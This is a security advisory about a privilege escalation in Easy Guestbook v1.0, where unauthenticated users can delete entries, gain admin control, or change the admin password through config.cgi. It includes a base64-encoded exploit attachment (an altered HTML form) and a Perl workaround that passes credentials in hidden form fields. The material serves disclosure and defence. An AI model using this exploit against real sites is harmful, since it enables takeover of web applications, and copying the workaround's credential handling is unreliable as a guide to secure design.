COMMAND

	Easy Guestbook user priviledge escalation

SYSTEMS AFFECTED

	Easy Guestbook v1.0

PROBLEM

	In AresU advisory [http://bosen.net/advisories/aresu-adv.002.txt] :
	

	1) Everyone can delete the entries and login as Admin Control.
	

	2) Everyone can reconfigure Guestbook  when  they  open  config.cgi  and
	change Admin Password.
	

	 Exploit :

	 =======

	

	Change action in the html form.
	

	

	Content-Transfer-Encoding: base64

	Content-Description: easyguestbook.zip

	Content-Disposition: attachment; filename="easyguestbook.zip"

	

	UEsDBBQAAAAIAI8S/CyEH+FLWgIAABgEAAASAAAAZWFzeWd1ZXN0Ym9vay5o

	dG1sdVPbbtswDH33V3DeywY4ttthWOelAdL1ghW9YU0L7KmQLSYWIkuGRCV1

	v36042xY0elFEi0eHvIcT99NJhCdCd/BRUBPpbVreAzaoBOl0ooUeoiiU0EI

	wyrgMugODr4mcJjnhxDd4wadoq7/dI1ShQY+3FnvVakRyIJEjZxMNQIacoz3

	kZM6T9h4mC+XWBHKAiIY1ysum4M0ZwKPaKR18PDzqoCaqC2ybLvdpsiPfeVU

	Sz6tbBrWEPXkYdG1yHx+EEjLDRhLEDzCvKrQe3gUWklBypq3CYIwErRdKQOC

	OcqGD98tf7M6hWgeqGYqwyzmDv0DRBcOkV56sAJOrEeTwEJZDF0CeP7lUwL3

	Yq3oUm1FAkY1cp7AOWfW58p5SmCuV5ZHWDcJXLv0TkhhVlxHblLud6gztlz2

	2KlByoTcKG97splgpDDhQMp6pPRM0aJWHrwNrkKorETg65IpowzV0LbQ0AbX

	Mhrc3lz9iiaTGc94WlOj+TAtrez6vT6YvaXGK3tMM37Hr7lCAw3ycORxfHd7

	v4hBVH2143ikv1F8b7LVHo674NGm1UrFDHC60+HGpmCXcDZKwaP/U76AqTJt

	ICCW9zgmfKYYNkIHvsRgRMP7MpihaAxevfD9M0P/k+VD2ai/eWPVa/aFWOEe

	ZeeJp2Yf9dTpHpxNMOlxCzjIW/oGQ2ApGqW7Avg/YOXEGN2iWtVUQGm1jGfT

	0s2mteM2b1s0O08pT27nwv91+IrriajWvcmG7D3VkoNPZJ/ELjgyray2roD3

	R3meH+VvUmLJsl6z4bCXPBs98BtQSwECFAAUAAAACACPEvwshB/hS1oCAAAY

	BAAAEgAAAAAAAAABACAAtoEAAAAAZWFzeWd1ZXN0Ym9vay5odG1sUEsFBgAA

	AAABAAEAQAAAAIoCAAAAAA==

	

SOLUTION

	 Workaround

	 ==========

	

	1) Add  Access  Validation  on  "delete_message"  function  and  "start"
	function. Add admin.cgi with this code:
	

	   sub login_verify 

	   { 

	        chomp($FORM{'login_username'}); 

	        chomp($FORM{'login_password'}); 

	        if (!($FORM{'login_username'} eq $username &&

	$FORM{'login_password'} eq $password)) 

	        { 

	          dienice("Sorry, but you have entered an

	invalid username or password.  Please press the 'back'

	button on your browser to return to the Login

	Screen."); 

	        } 

	   } 

	  

	And on the first line of "delete_message" function and "start"  function
	add this:
	

	   &login_verify; 

	

	And on the "start" function add this code in the <FORM>:
	

	   <input type="hidden" name="login_username"

	value="$FORM{'login_username'}"> 

	   <input type="hidden" name="login_password"

	value="$FORM{'login_password'}"> 

	   

	2) Delete config.cgi after you finish configure the Guestbook.